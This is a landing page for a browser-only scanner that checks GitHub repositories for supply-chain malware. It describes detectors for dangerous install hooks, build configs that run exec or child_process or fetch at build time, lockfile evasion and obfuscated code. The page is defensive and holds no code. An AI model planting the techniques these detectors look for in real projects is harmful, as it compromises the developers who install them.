Repo Malware Scanner

Four reads, zero execution.

The scan happens entirely in your browser. We never clone the repo, never run npm install, never execute a single line of its code. We just read files over the public GitHub API and look for known malware patterns.

1. 01

   You paste a GitHub URL

   Optionally a token — yours, stored only in your browser, used to raise GitHub's rate limit on your behalf.

2. 02

   We list the repo through GitHub's public API

   Same thing your browser does when you open the repo page. No cloning, no downloads to disk.

3. 03

   Four detectors scan the files in parallel

   Static pattern matching, no AI. Each detector looks for one specific class of attack.

4. 04

   Findings are graded and shown

   High / medium / low / info — with the file, line, and the exact code that triggered the rule.

What the detectors check

• Install scripts Dangerous postinstall / preinstall hooks and high-risk dependencies in package.json.
• Build configs Code execution hidden in vite.config, webpack.config, next.config and similar — exec, child_process, external fetch at build time.
• Lockfile evasion Dependencies declared in package.json but missing from the lockfile — the classic Contagious-Interview malware trick.
• Obfuscation High-entropy strings, eval, hex/base64 blobs, code that looks minified where it shouldn't be.

No API keys of ours are used. No backend. Nothing you scan touches our servers — the whole tool is a static page plus your browser calling GitHub directly.